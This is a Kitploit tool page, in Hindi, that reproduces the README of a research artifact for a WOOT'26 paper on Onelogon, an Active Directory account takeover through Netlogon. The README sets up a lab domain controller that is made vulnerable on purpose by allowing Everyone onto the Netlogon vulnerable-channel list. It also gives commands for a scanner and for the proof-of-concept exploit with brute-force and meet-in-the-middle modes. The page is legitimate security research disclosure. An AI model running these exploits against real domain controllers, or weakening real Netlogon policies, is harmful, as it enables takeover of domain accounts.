Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/rub-softsec/onelogon
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरणपेपर और शोध
GitHubrub-softsec/onelogon

onelogon

कोड और डेटा हमारे पेपर "Onelogon: Taking over Active Directory Accounts via Netlogon" (WOOT’26) के लिए।

रिपॉजिटरी देखें
11821828 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Onelogon: Netlogon के माध्यम से Active Directory खातों को हाइजैक करना

इस रिपॉजिटरी में हमारे शोधपत्र Onelogon: Netlogon के माध्यम से Active Directory खातों को हाइजैक करना (WOOT'26) से संबंधित कोड और डेटा शामिल है।

  1. संदर्भ
  2. उद्धरण कैसे करें
  3. आर्टिफैक्ट संरचना और सेटअप
  4. परीक्षण वातावरण स्थापित करना
  5. असुरक्षित सेटअप्स की स्कैनिंग
  6. शोषण
  7. मापों का पुनरुत्पादन

संदर्भ

हमारे शोधपत्र में वर्णित भेद्यता Zerologon भेद्यता के 2020 क्रिप्टोग्राफिक पैच में एक कमजोरी पर हमला करती है। उन खातों पर यह हमला संभव है जो एक समूह नीति में सूचीबद्ध हैं, जिसका उद्देश्य उन पुराने सेटअपों के लिए समर्थन देना है जो Netlogon साइनिंग और सीलिंग का समर्थन नहीं करते। भेद्यता, संपूर्ण अपेक्षित हमला श्रृंखला और संभावित शमन उपायों का विस्तृत विवरण शोधपत्र में पाया जा सकता है।

उद्धरण कैसे करें

@inproceedings{woot2026-onelogon,
  title     = {{Onelogon: Taking over Active Directory Accounts via Netlogon}},
  author    = {Neff, Alexander and Holl, Tobias and Borgolte, Kevin},
  booktitle = {Proceedings of the 20th USENIX WOOT Conference on Offensive Technologies},
  date      = {2026-08},
  editor    = {Bianchi, Antonio and Classen, Jiska},
  location  = {Baltimore, MD, USA},
  publisher = {USENIX Association}
}

आर्टिफैक्ट संरचना और सेटअप

इस आर्टिफैक्ट में स्कैनर और एक्सप्लॉइट्स के लिए एक Python poetry प्रोजेक्ट शामिल है।

आर्टिफैक्ट के साथ दी गई स्क्रिप्ट चलाने के लिए Python (3.12 या उससे नया) और poetry (निर्देश) या uv (निर्देश) स्थापित करें। सरलता के लिए, हम कमांड यह मानकर सूचीबद्ध कर रहे हैं कि आप poetry उपयोग कर रहे हैं; यदि आप uv चुनते हैं, तो poetry के किसी भी उल्लेख को uv से बदल दें।

इस दस्तावेज़ में दिए गए सभी कमांड आर्टिफैक्ट की मूल निर्देशिका में चलाए जाने चाहिए (जहाँ यह README है)।

यदि poetry उपयोग कर रहे हैं, तो सभी निर्भरताएँ स्थापित करने के लिए poetry install चलाएँ।

परीक्षण वातावरण स्थापित करना

शोधपत्र के परिणामों को पुनरुत्पादित करने के लिए, आप Zerologon-सुधारित Windows Server संस्करण का उपयोग करके एक Domain Controller स्थापित कर सकते हैं (हमने 2019 और 2025 दोनों संस्करणों के विरुद्ध एक्सप्लॉइट सत्यापित किया है)।

Windows Server 2025 की नई स्थापना पर Domain Controller स्थापित करने के लिए, निम्न कमांड चलाएँ:

# Update system and rename computer to "DC"
Install-Module -Name PSWindowsUpdate -Force
Install-WindowsUpdate -MicrosoftUpdate -AcceptAll
Rename-Computer -NewName "DC" -Restart

# Set up the domain (as "onelogon.local")
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSForest -DomainName "onelogon.local"

# Disable Administrator password expiry to keep the VM usable
Set-ADUser -Identity "Administrator" -PasswordNeverExpires $true

यह भेद्यता Domain Controller: Allow vulnerable Netlogon secure channel connections समूह नीति ऑब्जेक्ट या संबंधित रजिस्ट्री कुंजी में DACL में सूचीबद्ध किसी भी खाते पर लागू होती है:
HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\VulnerableChannelAllowList

आप Domain Controller पर इन मापदंडों को मैन्युअल रूप से कॉन्फ़िगर कर सकते हैं (यदि आप GPO प्रविष्टि अपडेट करते हैं तो gpupdate /force चलाना याद रखें), या रजिस्ट्री कुंजी में DACL में सभी खातों को जोड़ने के लिए निम्न कमांड चलाएँ:

Set-GPRegistryValue -Name "Default Domain Controllers Policy" `
                    -Key "HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters" `
                    -ValueName "VulnerableChannelAllowList" `
                    -Type String `
                    -Value "O:BAG:BAD:(A;;RC;;;WD)" # Everyone

असुरक्षित सेटअप्स की स्कैनिंग

यह निर्धारित करने के लिए कि Domain Controller अपनी VulnerableChannelAllowList में कौन से खाते सूचीबद्ध करता है, हम एक स्कैनर प्रदान करते हैं जो Domain Controller के रजिस्ट्री हाइव और GPO वॉल्यूम शेयर को पार्स करता है। ध्यान दें कि इस स्कैन के लिए रजिस्ट्री तक पहुँचने हेतु Domain Administrator विशेषाधिकारों की आवश्यकता होती है (एक्सप्लॉइट के लिए, निश्चित रूप से, इनकी आवश्यकता नहीं है)।

# Use the specified username and password to scan the target DC.
poetry run scan --dc-ip <IP of target DC> --username <username> --password <password>

# Specify `--help` to get additional usage instructions.
poetry run scan --help

एक सकारात्मक स्कैन परिणाम (Domain Controller पर असुरक्षित खाते हैं) सुरक्षा विवरणक को दर्शाएगा जिसमें असुरक्षित खाते शामिल हैं (Microsoft की Security Descriptor Definition Language में):

~$ poetry run scan --dc-ip 192.168.108.244 -u Administrator -p Xb52RLIiL5k2BhMC
[+] Found 1 matching policies in SYSVOL Share.
[+] Found vulnerable channel allow list in policy '{6AC1786C-016F-11D2-945F-00C04fB984F9}':
    'O:BAG:BAD:(A;;RC;;;BA)(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)'
[+] Found VulnerableChannelAllowList registry configuration:
    O:BAG:BAD:(A;;RC;;;BA)(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)

एक नकारात्मक परिणाम (लक्ष्य DC असुरक्षित नहीं है) इसके बजाय इस प्रकार दिखेगा:

~$ poetry run scan --dc-ip 192.168.108.244 -u Administrator -p Xb52RLIiL5k2BhMC
[-] No matching policies found in SYSVOL Share.
[-] Error while querying registry: RRP SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND
    - The system cannot find the file specified.

शोषण

किसी लक्षित Domain Controller के विरुद्ध proof-of-concept एक्सप्लॉइट चलाने के लिए, पहले एक असुरक्षित खाता चुनें। आपको Domain Controller का IP पता, उसका होस्ट नाम और असुरक्षित खाते का नाम चाहिए।

हमारे उदाहरण सेटअप में, असुरक्षित Domain Controller का नाम DC है। इसका मशीन खाता (DC$) GPO नीति में शामिल है और इसलिए Onelogon के प्रति असुरक्षित है।

# Run the meet-in-the-middle attack (Section 4.5 of the paper)
poetry run onelogon --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name>

# Run the 24-bit brute-force with a computer account (Section 4.4 of the paper)
poetry run onelogon --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name> \
                    --comp-username <Computer account> --comp-pass <Computer account password>

# Run the (slow) 32-bit brute-force with a computer account
poetry run onelogon --naive --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name> \
                    --comp-username <Computer account> --comp-pass <Computer account password>

# Run the (very slow) 32-bit brute-force without a computer account
poetry run onelogon --naive --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name>
सफल एक्सप्लॉइट आउटपुट

उदाहरण के तौर पर, हम परीक्षण वातावरण के विरुद्ध meet-in-the-middle हमले के एक सफल रन का आउटपुट प्रदान करते हैं:

टूल डाउनलोड करें